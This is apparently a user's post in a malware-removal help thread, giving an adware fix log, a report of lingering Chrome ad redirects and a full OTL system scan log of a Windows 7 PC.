"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FB369F07-98C3-4487-BD8B-FDD287D8CEAE}" => Key deleted successfully.
C:\Windows\System32\Tasks\Optimizer Pro Schedule => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Optimizer Pro Schedule" => Key deleted successfully.
Browser AdBlocker (HKLM-x32\...\{37476589-E48E-439E-A706-56189E2ED4C4}_is1) (Version:  - Browser AdBlocker) <==== ATTENTION => Error: No automatic fix found for this entry.
"C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exeEmptyTemp:" => File/Directory not found.
 
==== End of Fixlog ====

Chrome Status:

Same as before. Still opens but when clicking links I am still sometimes redirected to advertising.
Also I should mention this - when I click links in emails in Outlook, Chrome opens to my homepage but 4 other tabs also open with "Oops cannot be found". This has nothing to do with the previous problem but I would like to know how to fix this issue as well.

OTL.txt Log:

OTL logfile created on: 22/10/2014 2:12:31 PM - Run 3
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Mitey Fresh\Desktop\Kirra's\Documents\Virus scans
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17358)
Locale: 00000c09 | Country: Australia | Language: ENA | Date Format: d/MM/yyyy
 
3.79 Gb Total Physical Memory | 2.40 Gb Available Physical Memory | 63.28% Memory free
7.59 Gb Paging File | 6.05 Gb Available in Paging File | 79.78% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 273.39 Gb Total Space | 115.52 Gb Free Space | 42.25% Space Free | Partition Type: NTFS
Drive D: | 180.27 Gb Total Space | 117.47 Gb Free Space | 65.16% Space Free | Partition Type: NTFS
 
Computer Name: KIRRA-PC | User Name: Mitey Fresh | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/10/18 16:52:14 | 003,835,728 | ---- | M] (LogMeIn Inc.) -- D:\Games\LogMeIn Hamachi\hamachi-2-ui.exe
PRC - [2014/10/10 12:58:04 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Mitey Fresh\Desktop\Kirra's\Documents\Virus scans\OTL.exe
PRC - [2014/10/03 21:30:08 | 001,514,040 | ---- | M] (Spotify Ltd) -- C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
PRC - [2014/02/20 12:03:06 | 000,859,464 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
PRC - [2013/12/21 17:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/02/20 12:03:05 | 000,394,568 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\ppgooglenaclpluginchrome.dll
MOD - [2014/02/20 12:03:03 | 004,060,488 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\pdf.dll
MOD - [2014/02/20 12:02:59 | 000,716,616 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\libglesv2.dll
MOD - [2014/02/20 12:02:58 | 000,100,168 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\libegl.dll
MOD - [2014/02/20 12:02:56 | 001,647,432 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\ffmpegsumo.dll
MOD - [2014/02/20 12:02:54 | 000,051,016 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\chrome_elf.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2014/09/19 12:25:49 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2014/08/22 16:14:34 | 000,368,624 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2014/08/22 16:14:34 | 000,023,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2013/05/27 16:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2010/05/20 16:26:28 | 000,199,536 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft LifeCam\MSCamS64.exe -- (MSCamSvc)
SRV - [2014/10/18 16:52:14 | 002,529,616 | ---- | M] (LogMeIn Inc.) [Auto | Running] -- D:\Games\LogMeIn Hamachi\hamachi-2.exe -- (Hamachi2Svc)
SRV - [2014/09/24 20:48:07 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/05/30 04:36:52 | 000,543,424 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/04/19 13:26:23 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/03/21 09:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/12/21 17:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2013/10/23 08:15:08 | 000,172,192 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2013/09/11 21:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2014/07/17 19:05:06 | 000,125,584 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:64bit: - [2014/01/23 09:57:12 | 000,283,064 | ---- | M] (Disc Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV:64bit: - [2012/03/01 17:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2012/01/10 22:28:18 | 012,311,904 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2011/03/11 17:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/11 17:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2010/11/21 00:33:35 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/20 22:07:05 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2010/05/20 16:26:28 | 002,060,144 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VX1000.sys -- (VX1000)
DRV:64bit: - [2009/09/17 19:54:54 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (HECIx64)
DRV:64bit: - [2009/07/14 12:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/14 12:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/14 12:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/06/20 13:09:57 | 001,394,688 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athrx.sys -- (athr)
DRV:64bit: - [2009/06/11 07:35:42 | 000,187,392 | ---- | M] (Realtek Corporation                                            ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2009/06/11 07:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/11 07:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/11 07:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/11 07:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2009/03/18 17:35:42 | 000,033,856 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\hamachi.sys -- (hamachi)
DRV - [2009/07/14 12:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
 
 
IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = 
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = 
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = 
 
IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = 
 
IE - HKU\S-1-5-21-2275511576-419542734-2349628481-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = Preserve
IE - HKU\S-1-5-21-2275511576-419542734-2349628481-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com.au/
IE - HKU\S-1-5-21-2275511576-419542734-2349628481-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-AU
IE - HKU\S-1-5-21-2275511576-419542734-2349628481-1000\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com
IE - HKU\S-1-5-21-2275511576-419542734-2349628481-1000\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com
IE - HKU\S-1-5-21-2275511576-419542734-2349628481-1000\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-2275511576-419542734-2349628481-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...Box&FORM=IESR02
IE - HKU\S-1-5-21-2275511576-419542734-2349628481-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
========== FireFox ==========
 
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:28.0
FF - user.js - File not found
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.17.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@abr.gov.au/KeyMgmtPlugin: C:\Program Files (x86)\ABR\Plug-In\bin\npAUSkeyPlugin.dll (Commonwealth Government of Australia)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1200112.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.65.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.65.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3508.0205: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@citrixonline.com/appdetectorplugin: C:\Users\Mitey Fresh\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\ProgramData\iSkysoft\Video Converter Ultimate\[email protected]\ [2014/09/30 17:07:04 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 28.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 28.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 28.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 28.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
 
[2013/10/05 13:03:05 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Extensions
[2014/06/05 12:10:08 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/04/19 13:26:24 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
========== Chrome  ==========
 
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - plugin: Error reading preferences file
CHR - Extension: SEOquake = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\akdgnmcogleenhbclghghlkkdndkjdjc\1.0.21_0\
CHR - Extension: Google Docs = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\
CHR - Extension: Google Drive = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: YouTube = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: Google Search = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: Reddit Enhancement Suite = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb\4.3.2.1_0\
CHR - Extension: Google Wallet = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_1\
CHR - Extension: Gmail = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\
 
O1 HOSTS File: ([2009/06/11 08:00:26 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (iSkysoft Video Converter Ultimate 5.1.0) - {AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE} - C:\ProgramData\iSkysoft\Video Converter Ultimate\WSBrowserAppMgr.dll (Wondershare)
O4:64bit: - HKLM..\Run: [FAHConsole] C:\Program Files\File Association Helper\FAHConsole.exe (Nico Mak Computing)
O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4:64bit: - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4 - HKLM..\Run: [LogMeIn Hamachi Ui] D:\Games\LogMeIn Hamachi\hamachi-2-ui.exe (LogMeIn Inc.)
O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-2275511576-419542734-2349628481-1000..\Run: [Spotify Web Helper] C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe (Spotify Ltd)
O4 - HKU\.DEFAULT..\RunOnce: [SPReview] "C:\Windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"http://go.microsoft..../?LinkID=122915" /build:7601 File not found
O4 - HKU\S-1-5-18..\RunOnce: [SPReview] "C:\Windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"http://go.microsoft..../?LinkID=122915" /build:7601 File not found
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{50EF78CE-304E-4B7A-9AAB-DDBCC5200660}: DhcpNameServer = 192.168.0.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{910DEC28-ADB7-41E8-A772-D1D261B4EC8C}: DhcpNameServer = 192.168.1.1 192.168.1.1
O18:64bit: - Protocol\Handler\msdaipp - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp\0x00000001 - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp\oledb - No CLSID value found
O18:64bit: - Protocol\Handler\mso-offdap - No CLSID value found
O18:64bit: - Protocol\Handler\mso-offdap11 - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{496991f1-83b7-11e3-a045-406186b70622}\Shell - "" = AutoRun
O33 - MountPoints2\{496991f1-83b7-11e3-a045-406186b70622}\Shell\AutoRun\command - "" = H:\autorun.exe
O33 - MountPoints2\{6140cd31-99d4-11e3-ac34-406186b70622}\Shell - "" = AutoRun
O33 - MountPoints2\{6140cd31-99d4-11e3-ac34-406186b70622}\Shell\AutoRun\command - "" = F:\HTC_Sync_Manager_PC.exe
O33 - MountPoints2\{efd7f59c-3f87-11e4-aca2-406186b70622}\Shell - "" = AutoRun
O33 - MountPoints2\{efd7f59c-3f87-11e4-aca2-406186b70622}\Shell\AutoRun\command - "" = F:\Startme.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/10/22 14:15:31 | 000,000,000 | -HSD | C] -- C:\Config.Msi
[2014/10/21 01:27:42 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Hamachi
[2014/10/16 14:16:26 | 000,000,000 | ---D | C] -- C:\zoek_backup
[2014/10/15 15:39:16 | 000,000,000 | ---D | C] -- C:\FRST
[2014/10/15 13:08:47 | 000,156,824 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mscorier.dll
[2014/10/15 13:08:47 | 000,156,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mscorier.dll
[2014/10/15 13:08:46 | 001,943,696 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dfshim.dll
[2014/10/15 13:08:46 | 001,131,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dfshim.dll
[2014/10/15 13:08:46 | 000,073,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mscories.dll
[2014/10/15 13:08:45 | 000,081,560 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mscories.dll
[2014/10/15 13:08:43 | 000,507,392 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll
[2014/10/15 13:08:43 | 000,276,480 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\generaltel.dll
[2014/10/15 13:08:41 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll
[2014/10/15 13:08:39 | 000,597,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\jscript9diag.dll
[2014/10/15 13:08:39 | 000,069,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll
[2014/10/15 13:08:39 | 000,051,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieetwproxystub.dll
[2014/10/15 13:08:39 | 000,032,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iernonce.dll
[2014/10/15 13:08:38 | 000,710,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ie4uinit.exe
[2014/10/15 13:08:38 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
[2014/10/15 13:08:38 | 000,033,792 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iernonce.dll
[2014/10/15 13:08:37 | 000,072,704 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\JavaScriptCollectionAgent.dll
[2014/10/15 13:08:37 | 000,048,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwproxystub.dll
[2014/10/15 13:08:34 | 002,017,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\inetcpl.cpl
[2014/10/15 13:08:34 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iesetup.dll
[2014/10/15 13:08:33 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollectorres.dll
[2014/10/15 13:08:32 | 000,731,136 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msfeeds.dll
[2014/10/15 13:08:32 | 000,446,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtmsft.dll
[2014/10/15 13:08:32 | 000,440,320 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieui.dll
[2014/10/15 13:08:32 | 000,111,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollector.exe
